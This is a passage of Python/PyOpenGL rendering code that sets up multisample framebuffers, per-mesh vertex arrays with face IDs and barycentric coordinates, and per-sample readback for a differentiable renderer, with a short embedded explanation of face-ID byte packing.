GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT4, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric2,
0)
self.z_buf_ms_errors = GL.glGenTextures(1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.z_buf_ms_errors)
GL.glTexImage2DMultisample(GL.GL_TEXTURE_2D_MULTISAMPLE, self.nsamples, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'],
False)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D_MULTISAMPLE, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
# GL.glTexParameteri(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_LINEAR)
GL.glFramebufferTexture2D(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_TEXTURE_2D_MULTISAMPLE, self.z_buf_ms_errors, 0)
# self.z_buf_ms_errors = GL.glGenRenderbuffers(1)
# GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.z_buf_ms_errors)
# GL.glRenderbufferStorageMultisample(GL.GL_RENDERBUFFER, self.nsamples, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'])
# GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_RENDERBUFFER, self.z_buf_ms_errors)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
# GL.glDisable(GL.GL_CULL_FACE)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
status = GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER)
print("FRAMEBUFFER ERR: " + str(status))
assert status == GL.GL_FRAMEBUFFER_COMPLETE
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
self.fbo_sample_fetch = GL.glGenFramebuffers(1)
GL.glDepthMask(GL.GL_TRUE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo_sample_fetch)
self.render_buffer_fetch_sample_render = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_render)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RGB8, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_render)
self.render_buffer_fetch_sample_position = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_position)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_position)
self.render_buffer_fetch_sample_face = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_face)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_R32UI, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT2, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_face)
#
self.render_buffer_fetch_sample_barycentric1 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric1)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT3, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric1)
self.render_buffer_fetch_sample_barycentric2 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric2)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT4, GL.GL_RENDERBUFFER, self.render_buffer_fetch_sample_barycentric2)
self.z_buf_samples_errors = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.z_buf_samples_errors)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_RENDERBUFFER, self.z_buf_samples_errors)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
GL.glDisable(GL.GL_CULL_FACE)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
status = GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER)
print("FRAMEBUFFER ERR: " + str(status))
assert status == GL.GL_FRAMEBUFFER_COMPLETE
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
# FBO_f
self.fbo_errors_nonms = GL.glGenFramebuffers(1)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo_errors_nonms)
render_buf_errors_render = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_render)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RGB8, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_RENDERBUFFER, render_buf_errors_render)
render_buf_errors_sample_position = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_position)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_RENDERBUFFER, render_buf_errors_sample_position)
render_buf_errors_sample_face = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_face)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_R32UI, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT2, GL.GL_RENDERBUFFER, render_buf_errors_sample_face)
#
render_buf_errors_sample_barycentric1 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric1)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT3, GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric1)
render_buf_errors_sample_barycentric2 = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric2)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RG32F, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT4, GL.GL_RENDERBUFFER, render_buf_errors_sample_barycentric2)
#
z_buf_samples_errors = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, z_buf_samples_errors)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_RENDERBUFFER, z_buf_samples_errors)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
status = GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER)
print("FRAMEBUFFER ERR: " + str(status))
assert status == GL.GL_FRAMEBUFFER_COMPLETE
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
self.textureObjLoc = GL.glGetUniformLocation(self.errorTextureProgram, "myTextureSampler")
# Add background cube:
position_location = GL.glGetAttribLocation(self.errorTextureProgram, 'position')
color_location = GL.glGetAttribLocation(self.errorTextureProgram, 'colorIn')
uvs_location = GL.glGetAttribLocation(self.errorTextureProgram, 'vertexUV')
face_ids_location = GL.glGetAttribLocation(self.errorTextureProgram, 'face_id')
barycentric_location = GL.glGetAttribLocation(self.errorTextureProgram, 'barycentric')
# self.vbo_verts_cube= vbo.VBO(np.array(self.v_bgCube).astype(np.float32))
# self.vbo_colors_cube= vbo.VBO(np.array(self.vc_bgCube).astype(np.float32))
# self.vbo_uvs_cube = vbo.VBO(np.array(self.ft_bgCube).astype(np.float32))
# self.vao_bgCube = GL.GLuint(0)
# GL.glGenVertexArrays(1, self.vao_bgCube)
#
# GL.glBindVertexArray(self.vao_bgCube)
# self.vbo_f_bgCube = vbo.VBO(np.array(self.f_bgCube).astype(np.uint32), target=GL.GL_ELEMENT_ARRAY_BUFFER)
# self.vbo_f_bgCube.bind()
# self.vbo_verts_cube.bind()
# GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
# self.vbo_colors_cube.bind()
# GL.glEnableVertexAttribArray(color_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
# self.vbo_uvs_cube.bind()
# GL.glEnableVertexAttribArray(uvs_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(uvs_location, 2, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
#
# f = self.f_bgCube
# fc = np.tile(np.arange(len(self.f), len(self.f) + len(f))[:, None], [1, 3]).ravel()
# # fc[:, 0] = fc[:, 0] & 255
# # fc[:, 1] = (fc[:, 1] >> 8) & 255
# # fc[:, 2] = (fc[:, 2] >> 16) & 255
# fc = np.asarray(fc, dtype=np.uint32)
# vbo_face_ids_cube = vbo.VBO(fc)
# vbo_face_ids_cube.bind()
# GL.glEnableVertexAttribArray(face_ids_location) # from 'location = 0' in shader
# GL.glVertexAttribIPointer(face_ids_location, 1, GL.GL_UNSIGNED_INT, 0, None)
#
# #Barycentric cube:
# f_barycentric = np.asarray(np.tile(np.eye(3), (f.size // 3, 1)), dtype=np.float32, order='C')
# vbo_barycentric_cube = vbo.VBO(f_barycentric)
# vbo_barycentric_cube.bind()
# GL.glEnableVertexAttribArray(barycentric_location) # from 'location = 0' in shader
# GL.glVertexAttribPointer(barycentric_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
GL.glBindVertexArray(0)
self.vao_quad = GL.GLuint(0)
GL.glGenVertexArrays(1, self.vao_quad)
GL.glBindVertexArray(self.vao_quad)
# Bind VAO
self.vbo_face_ids_list = []
self.vbo_barycentric_list = []
self.vao_errors_mesh_list = []
flen = 1
for mesh in range(len(self.f_list)):
vaos_mesh = []
vbo_face_ids_mesh = []
vbo_barycentric_mesh = []
for polygons in np.arange(len(self.f_list[mesh])):
vao = GL.GLuint(0)
GL.glGenVertexArrays(1, vao)
GL.glBindVertexArray(vao)
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
vbo_f.bind()
vbo_verts = self.vbo_verts_mesh[mesh][polygons]
vbo_verts.bind()
GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
vbo_colors = self.vbo_colors_mesh[mesh][polygons]
vbo_colors.bind()
GL.glEnableVertexAttribArray(color_location)  # from 'location = 1' in shader
GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
vbo_uvs = self.vbo_uvs_mesh[mesh][polygons]
vbo_uvs.bind()
GL.glEnableVertexAttribArray(uvs_location)  # from 'location = 2' in shader
GL.glVertexAttribPointer(uvs_location, 2, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
f = self.f_list[mesh][polygons]
fc = np.tile(np.arange(flen, flen + len(f))[:, None], [1, 3]).ravel()
# fc[:, 0] = fc[:, 0] & 255
# fc[:, 1] = (fc[:, 1] >> 8) & 255
# fc[:, 2] = (fc[:, 2] >> 16) & 255
fc = np.asarray(fc, dtype=np.uint32)
vbo_face_ids = vbo.VBO(fc)
vbo_face_ids.bind()
GL.glEnableVertexAttribArray(face_ids_location)  # from 'location = 3' in shader
GL.glVertexAttribIPointer(face_ids_location, 1, GL.GL_UNSIGNED_INT, 0, None)
f_barycentric = np.asarray(np.tile(np.eye(3), (f.size // 3, 1)), dtype=np.float32, order='C')
vbo_barycentric = vbo.VBO(f_barycentric)
vbo_barycentric.bind()
GL.glEnableVertexAttribArray(barycentric_location)  # from 'location = 4' in shader
GL.glVertexAttribPointer(barycentric_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
flen += len(f)
vaos_mesh.append(vao)
vbo_face_ids_mesh.append(vbo_face_ids)
vbo_barycentric_mesh.append(vbo_barycentric)  # was appending vbo_face_ids by mistake
GL.glBindVertexArray(0)
self.vbo_face_ids_list.append(vbo_face_ids_mesh)
self.vbo_barycentric_list.append(vbo_barycentric_mesh)
self.vao_errors_mesh_list.append(vaos_mesh)
def render_image_buffers(self):
GL.glEnable(GL.GL_MULTISAMPLE)
GL.glEnable(GL.GL_SAMPLE_SHADING)
GL.glMinSampleShading(1.0)
self.makeCurrentContext()
if hasattr(self, 'bgcolor'):
GL.glClearColor(self.bgcolor.r[0], self.bgcolor.r[1 % self.num_channels], self.bgcolor.r[2 % self.num_channels], 1.)
GL.glUseProgram(self.errorTextureProgram)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_ms_errors)
drawingBuffers = [GL.GL_COLOR_ATTACHMENT0, GL.GL_COLOR_ATTACHMENT1, GL.GL_COLOR_ATTACHMENT2, GL.GL_COLOR_ATTACHMENT3, GL.GL_COLOR_ATTACHMENT4]
GL.glDrawBuffers(5, drawingBuffers)
# GL.glClearBufferiv(GL.GL_COLOR, 0, 0)
GL.glClearColor(0., 0., 0., 0.)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
#ImageGT
GL.glActiveTexture(GL.GL_TEXTURE1)
# GL.glBindImageTexture(1,self.textureGT, 0, GL.GL_FALSE, 0, GL.GL_READ_ONLY, GL.GL_RGBA8)
GL.glBindTexture(GL.GL_TEXTURE_2D, self.textureGT)
self.textureGTLoc = GL.glGetUniformLocation(self.errorTextureProgram, "imageGT")
GL.glUniform1i(self.textureGTLoc, 1)
wwLoc = GL.glGetUniformLocation(self.errorTextureProgram, 'ww')
whLoc = GL.glGetUniformLocation(self.errorTextureProgram, 'wh')
GL.glUniform1f(wwLoc, self.frustum['width'])
GL.glUniform1f(whLoc, self.frustum['height'])
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))), np.float32))
MVP = np.dot(self.projectionMatrix, view_mtx)
for mesh in range(len(self.f_list)):
for polygons in np.arange(len(self.f_list[mesh])):
vao_mesh = self.vao_errors_mesh_list[mesh][polygons]
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
GL.glBindVertexArray(vao_mesh)
# vbo_color.bind()
f = self.f_list[mesh][polygons]
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
self.vbo_colors_mesh[mesh][polygons].set_array(colors_by_face.astype(np.float32))
self.vbo_colors_mesh[mesh][polygons].bind()
if self.f.shape[1] == 2:
primtype = GL.GL_LINES
else:
primtype = GL.GL_TRIANGLES
assert (primtype == GL.GL_TRIANGLES)
# GL.glUseProgram(self.errorTextureProgram)
if self.haveUVs_list[mesh][polygons]:
texture = self.textureID_mesh_list[mesh][polygons]
else:
texture = self.whitePixelTextureID
GL.glActiveTexture(GL.GL_TEXTURE0)
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
GL.glUniform1i(self.textureObjLoc, 0)
GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
GL.glDrawArrays(primtype, 0, len(vbo_f) * vbo_f.data.shape[1])
# # #Background cube:
# GL.glBindVertexArray(self.vao_bgCube)
# self.vbo_f_bgCube.bind()
# texture = self.whitePixelTextureID
# self.vbo_uvs_cube.bind()
#
# GL.glActiveTexture(GL.GL_TEXTURE0)
# GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
# GL.glUniform1i(self.textureObjLoc, 0)
# GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
#
# GL.glDrawElements(primtype, len(self.vbo_f_bgCube)*self.vbo_f_bgCube.data.shape[1], GL.GL_UNSIGNED_INT, None)
# self.draw_visibility_image_ms(self.v, self.f)
# GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, 0)
#
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_ms_errors)
# GL.glFramebufferTexture2D(GL.GL_READ_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render, 0)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
# GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glDrawBuffer(GL.GL_COLOR_ATTACHMENT0)
# GL.glBlitFramebuffer(0, 0, self.frustum['width'], self.frustum['height'], 0, 0, self.frustum['width'], self.frustum['height'],GL.GL_COLOR_BUFFER_BIT, GL.GL_NEAREST)
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
# # result_blit = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
# result_blit2 = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
#
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_ms_errors)
# GL.glFramebufferTexture2D(GL.GL_READ_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT1, GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position, 0)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT1)
# GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glDrawBuffer(GL.GL_COLOR_ATTACHMENT1)
# GL.glBlitFramebuffer(0, 0, self.frustum['width'], self.frustum['height'], 0, 0, self.frustum['width'], self.frustum['height'],GL.GL_COLOR_BUFFER_BIT, GL.GL_NEAREST)
# GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_errors_nonms)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT1)
# result_blit_pos = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
GL.glUseProgram(self.fetchSamplesProgram)
# GL.glDisable(GL.GL_MULTISAMPLE)
self.colorsLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, "colors")
self.sample_positionsLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_positions")
self.sample_facesLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_faces")
self.sample_barycentric1Loc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_barycentric_coords1")
self.sample_barycentric2Loc = GL.glGetUniformLocation(self.fetchSamplesProgram, "sample_barycentric_coords2")
# GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
# GL.glActiveTexture(GL.GL_TEXTURE2)
# GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_face)
# GL.glUniform1i(self.sample_facesLoc, 2)
wwLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, 'ww')
whLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, 'wh')
GL.glUniform1f(wwLoc, self.frustum['width'])
GL.glUniform1f(whLoc, self.frustum['height'])
# Per-sample buffers in image (height, width) order, matching the glReadPixels readback below.
self.renders = np.zeros([self.nsamples, self.frustum['height'], self.frustum['width'], 3])
self.renders_sample_pos = np.zeros([self.nsamples, self.frustum['height'], self.frustum['width'], 2])
self.renders_faces = np.zeros([self.nsamples, self.frustum['height'], self.frustum['width']]).astype(np.uint32)
self.renders_sample_barycentric1 = np.zeros([self.nsamples, self.frustum['height'], self.frustum['width'], 2])
self.renders_sample_barycentric2 = np.zeros([self.nsamples, self.frustum['height'], self.frustum['width'], 1])
self.renders_sample_barycentric = np.zeros([self.nsamples, self.frustum['height'], self.frustum['width'], 3])
GL.glDisable(GL.GL_DEPTH_TEST)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_sample_fetch)
drawingBuffers = [GL.GL_COLOR_ATTACHMENT0, GL.GL_COLOR_ATTACHMENT1, GL.GL_COLOR_ATTACHMENT2, GL.GL_COLOR_ATTACHMENT3,
GL.GL_COLOR_ATTACHMENT4]
GL.glDrawBuffers(5, drawingBuffers)
GL.glClearColor(0., 0., 0., 0.)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
for sample in range(self.nsamples):
sampleLoc = GL.glGetUniformLocation(self.fetchSamplesProgram, 'sample')
GL.glUniform1i(sampleLoc, sample)
GL.glActiveTexture(GL.GL_TEXTURE0)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_render)
GL.glUniform1i(self.colorsLoc, 0)
GL.glActiveTexture(GL.GL_TEXTURE1)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_position)
GL.glUniform1i(self.sample_positionsLoc, 1)
GL.glActiveTexture(GL.GL_TEXTURE2)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_faces)
GL.glUniform1i(self.sample_facesLoc, 2)
GL.glActiveTexture(GL.GL_TEXTURE3)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric1)
GL.glUniform1i(self.sample_barycentric1Loc, 3)
GL.glActiveTexture(GL.GL_TEXTURE4)
GL.glBindTexture(GL.GL_TEXTURE_2D_MULTISAMPLE, self.texture_errors_sample_barycentric2)
GL.glUniform1i(self.sample_barycentric2Loc, 4)
GL.glBindVertexArray(self.vao_quad)
GL.glDrawArrays(GL.GL_POINTS, 0, 1)
# GL.glBindVertexArray(self.vao_bgCube)
# # self.vbo_f_bgCube.bind()
# GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
#
# GL.glDrawElements(primtype, len(self.vbo_f_bgCube) * self.vbo_f_bgCube.data.shape[1], GL.GL_UNSIGNED_INT, None)
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_sample_fetch)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(
self.frustum['height'], self.frustum['width'], 3)[:, :, 0:3].astype(np.float64))
self.renders[sample] = result
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT1)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(
self.frustum['height'], self.frustum['width'], 3)[:, :, 0:2].astype(np.float64))
self.renders_sample_pos[sample] = result
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT2)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RED_INTEGER, GL.GL_UNSIGNED_INT),
np.uint32).reshape(self.frustum['height'], self.frustum['width'])[:, :].astype(np.uint32))
self.renders_faces[sample] = result
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT3)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(
self.frustum['height'], self.frustum['width'], 3)[:, :, 0:2].astype(np.float64))
self.renders_sample_barycentric1[sample] = result
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT4)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(
self.frustum['height'], self.frustum['width'], 3)[:, :, 0:1].astype(np.float64))
self.renders_sample_barycentric2[sample] = result
self.renders_sample_barycentric[sample] = np.concatenate(
[self.renders_sample_barycentric1[sample], self.renders_sample_barycentric2[sample][:, :, 0:1]], 2)
# GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT2)
# result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
# self.renders_faces[sample] = result
GL.glBindVertexArray(0)
GL.glClearColor(0., 0., 0., 1.)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glDisable(GL.GL_MULTISAMPLE)
# Finally, resolve the per-sample renders and mark the image and derivatives for recomputation.
self.render_resolved = np.mean(self.renders, 0)
self.updateRender = True
self.updateDerivatives_verts = True
self.updateDerivatives_vc = True
def draw_visibility_image_ms(self, v, f):
"""Assumes camera is set up correctly in"""
GL.glUseProgram(self.visibilityProgram_ms)
v = np.asarray(v)
# Attach FBO
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
fc = np.arange(1, len(f) + 1)
fc = np.tile(fc.reshape((-1, 1)), (1, 3))
fc[:, 0] = fc[:, 0] & 255
fc[:, 1] = (fc[:, 1] >> 8) & 255
fc[:, 2] = (fc[:, 2] >> 16) & 255
fc = np.asarray(fc, dtype=np.uint8)
self.draw_colored_primitives_ms(self.vao_dyn_ub, v, f, fc)
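The bit-packing above stores 1-based face indices in the three bytes of an RGB color buffer. A minimal sketch of that encoding together with its inverse decode (hypothetical helper names, assuming face counts below 2**24):

```python
import numpy as np

def encode_face_ids(num_faces):
    # Same packing as above: 1-based ids split into low/mid/high bytes.
    fc = np.arange(1, num_faces + 1)
    fc = np.tile(fc.reshape((-1, 1)), (1, 3))
    fc[:, 0] = fc[:, 0] & 255
    fc[:, 1] = (fc[:, 1] >> 8) & 255
    fc[:, 2] = (fc[:, 2] >> 16) & 255
    return np.asarray(fc, dtype=np.uint8)

def decode_face_ids(rgb):
    # Inverse: rebuild the 1-based id from the three bytes.
    rgb = rgb.astype(np.uint32)
    return rgb[:, 0] + (rgb[:, 1] << 8) + (rgb[:, 2] << 16)

ids = decode_face_ids(encode_face_ids(70000))
```

The round trip is exact for up to 2**24 - 1 faces, after which the id would overflow the three bytes.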
# this assumes that fc is either "by faces" or "verts by face", not "by verts"
def draw_colored_primitives_ms(self, vao, v, f, fc=None):
# gl.EnableClientState(GL_VERTEX_ARRAY)
verts_by_face = np.asarray(v.reshape((-1, 3))[f.ravel()], dtype=np.float64, order='C')
# gl.VertexPointer(verts_by_face)
GL.glBindVertexArray(vao)
self.vbo_verts_dyn.set_array(verts_by_face.astype(np.float32))
self.vbo_verts_dyn.bind()
if fc is not None:
# gl.EnableClientState(GL_COLOR_ARRAY)
if fc.size == verts_by_face.size:
vc_by_face = fc
else:
vc_by_face = np.repeat(fc, f.shape[1], axis=0)
if vc_by_face.size != verts_by_face.size:
raise Exception('fc must have either rows=(#rows in faces) or rows=(# elements in faces)')
vc_by_face = np.asarray(vc_by_face, dtype=np.uint8, order='C')
self.vbo_colors_ub.set_array(vc_by_face)
self.vbo_colors_ub.bind()
primtype = GL.GL_TRIANGLES
self.vbo_indices_dyn.set_array(np.arange(f.size, dtype=np.uint32).ravel())
self.vbo_indices_dyn.bind()
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_ms_errors)
drawingBuffers = [GL.GL_COLOR_ATTACHMENT2]
GL.glDrawBuffers(1, drawingBuffers)
